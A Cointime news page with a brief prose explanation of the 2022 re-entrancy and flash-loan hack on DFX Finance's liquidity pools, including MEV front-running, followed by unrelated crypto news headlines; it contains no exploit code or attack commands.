Cointime

Cointime

Download App
iOS & Android

DFX Finance Smart Contract Vulnerability Explained

Cointime Official

by Shashank

Overview:

On 11th November 2022, a Re-entrancy attack occurred, which resulted in draining a total of ~$7.5M from DFX Finance’s Polygon liquidity pools. The attacker could only transfer $4.3 million worth of assets into their wallet. The remaining portion–about $3.2 million– was extracted by an MEV bot in a front-running transaction, also called a sandwich attack.

Smart Contract Hack Overview:

  • Attacker’s address: 0x14c1
  • DFX Finance Code: 0x8888
  • MEV Bot Address & transaction: 0x6c6b
  • MEV Bot’s wallet address: 0xfde
  • Unconventional ordering transaction Block: 15941904
  • MEV Bot & wallet transaction address analysis: 0xfde0d

GitHub code link:

Decoding the Smart Contract Vulnerability:

Series of transactions connected to the wallet and MEV bot
DFX Finance Smart Contract Vulnerability
  • Because there was no outstanding amount at the attacker’s address, the transactions satisfied the validation when the transaction pair contract’s balance was checked, bypassing the necessity for transaction pair checks to pay back the flash loan. Link
  • The withdraw () function had a Re-entrancy protection modifier which could not be triggered since the flash loan was completed but the lptokens deposited by the attacker still existed in the lending contract, which actually belonged to the attacker, thus allowing an attacker to call the emergencyWithdraw() function any number of time until attacker withdraw all the deposited tokens.
  • Due to the MEV bots being activated, the attacker lost a significant amount of money to the owner of those bots and was only able to recover about $4M in stolen money.
smart contract
Comments

All Comments

Recommended for you

  • Nigeria’s Central Bank Denies Call to Freeze Crypto Exchange Users’ Bank Accounts

    In response to the news that "the Central Bank of Nigeria has issued a ban on cryptocurrency trading and requested financial institutions to freeze the accounts of users related to Bybit, KuCoin, OKX, and Binance exchanges," the Central Bank of Nigeria (CBN) stated in a document that the CBN has not officially issued such a notice, and the public should check the official website for the latest information to ensure the reliability of the news. According to a screenshot reported by Cointelegraph yesterday, the Central Bank of Nigeria has requested all banks and financial institutions to identify individuals or entities trading with cryptocurrency exchanges and set these accounts to "Post-No-Debit" (PND) status within six months. This means that account holders will not be able to withdraw funds or make payments from these accounts. According to the screenshot, the Central Bank of Nigeria has listed cryptocurrency exchanges that have not obtained operating licenses in Nigeria, including Bybit, KuCoin, OKX, and Binance. The Central Bank of Nigeria will crack down on the illegal purchase and sale of stablecoin USDT on these platforms, especially those using peer-to-peer (P2P) transactions. In addition, the Central Bank of Nigeria pointed out that financial institutions are prohibited from engaging in cryptocurrency transactions or providing payment services to cryptocurrency exchanges.

  • Universal verification layer Aligned Layer completes $20 million Series A financing

    Ethereum's universal verification layer Aligned Layer has completed a $20 million Series A financing round, led by Hack VC, with participation from dao5, L2IV, Nomad Capital, and others. The Aligned Layer mainnet is scheduled to launch in the second quarter of 2024. As the EigenLayer AVS, Aligned Layer provides Ethereum with a new infrastructure for obtaining economically viable zero-knowledge proof verification for all proof systems.

  • The total open interest of Bitcoin contracts on the entire network reached 31.41 billion US dollars

    According to Coinglass data, the total open position of Bitcoin futures contracts on the entire network is 487,500 BTC (approximately 31.41 billion US dollars).Among them, the open position of CME Bitcoin contracts is 143,600 BTC (approximately 9.23 billion US dollars), ranking first;The open position of Binance Bitcoin contracts is 109,400 BTC (approximately 7.07 billion US dollars), ranking second.

  • Bitcoin mining difficulty increased by 1.99% to 88.1T yesterday, a record high

    According to BTC.com data reported by Jinse Finance, the mining difficulty of Bitcoin has increased by 1.99% to 88.1T at block height 840,672 (22:51:52 on April 24), reaching a new historical high. Currently, the average network computing power is 642.78EH/s.

  • US Stablecoin Bill Could Be Ready Soon, Says Top Democrat on House Financial Services Committee

    The top Democrat on the U.S. House Financial Services Committee, Maxine Waters, has stated that a stablecoin bill may be ready soon, indicating progress towards a new stablecoin law in the U.S. before the elections. Waters has previously criticized a version of the stablecoin bill, but emphasized the importance of protecting investors and ensuring that stablecoins are backed by assets. Congressional movement on stablecoin legislation has recently picked up pace, with input from the U.S. Federal Reserve, Treasury Department, and White House in crafting the bill. The stablecoin bill could potentially be tied to a must-pass Federal Aviation Administration reauthorization due next month, and may also be paired with a marijuana banking bill.

  • Crypto mining company Argo mined 1,760 bitcoins last year and earned $50.6 million

    Crypto mining company Argo Blockchain has released its 2023 financial year performance report, which includes:

  • Crypto VC market hits 12-month high in March, with total investment exceeding $1 billion

    According to data from Cointelegraph, the cryptocurrency venture capital market continued to recover in March and April 2024. In March, 161 individual transactions were completed, setting a record in the past 12 months, with a total investment of more than $1 billion, an increase of 52% from the previous month. Although April has not yet ended, as of now, 90 transactions have been completed, attracting more than $820 million in investment.

  • Ethereum Layer 2 TVL has reached $39 billion

    L2BEAT data shows that Ethereum Layer2 TVL has reached $39 billion, with a 7-day increase of 6.66%.

  • Caixin: Mainland investors are currently not allowed to participate in the trading of Hong Kong virtual asset spot ETFs

    According to Caixin, the first batch of six virtual asset spot ETFs issued by Boshi International, Huaxia Fund (Hong Kong), and Jiashi International has been officially approved by the Hong Kong Securities Regulatory Commission. The goal is to be listed on April 30, 2024. It should be noted that mainland Chinese investors are currently not able to participate in the trading of these ETFs, despite the fact that they are first issued by Hong Kong companies under the umbrella of Chinese public funds.According to the product list on the Hong Kong Securities Regulatory Commission website, these six virtual asset spot ETFs were officially approved on April 23, 2024. The products are as follows: Jiashi Bitcoin Spot ETF (03439.HK), Jiashi Ethereum Spot ETF (03179.HK), Huaxia Bitcoin ETF (03042.HK), Huaxia Ethereum ETF (03046.HK), Boshi HashKey Bitcoin ETF (03008.HK), and Boshi HashKey Ethereum ETF (03009.HK).

  • Another person involved in the OneCoin scheme was arrested and the US prosecutors have filed a lawsuit against him

    According to court documents submitted by the Southern District of New York, William Morro, a person involved in OneCoin, has been arrested. Prosecutors said Morro lied to banks about the source of funds to conceal the source of funds related to OneCoin. He was involved in transferring $35 million related to OneCoin to an account in Hong Kong and about $6 million to an account in the United States.

Daily Must-Read

Popular Activities

Delysium $AGI & AI Private Yacht Party

Delysium $AGI & AI Private Yacht Party

March 27 - March 27
Seoul

Popular Tags

Cointime
News
Contents
RSS
Company